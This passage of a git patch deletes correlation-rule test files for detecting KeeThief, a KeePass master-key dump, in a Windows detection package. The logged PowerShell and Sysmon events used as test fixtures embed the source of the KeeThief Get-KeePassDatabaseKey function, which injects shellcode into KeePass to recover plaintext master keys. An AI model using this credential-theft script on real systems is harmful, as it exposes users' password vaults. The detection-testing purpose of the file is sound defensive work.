$Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"} - -# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc deleted file mode 100644 index 4a34dbda..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('AnotherMethod').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('AnotherMethod').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.9801378Z\"},\"EventRecordID\":\"7071\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.980\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1384\"},{\"Name\":\"StartAddress\",\"text\":\"0x06160000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.980Z", "type": "raw", "uuid": "d26cbfcd-61bb-4a46-83a3-3a1379d98dbc"} - -expect not {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"} From 112eb8688c1106cc3200220ee4778b0e02bc3909 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 18:47:36 +0300 Subject: [PATCH 09/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20?= 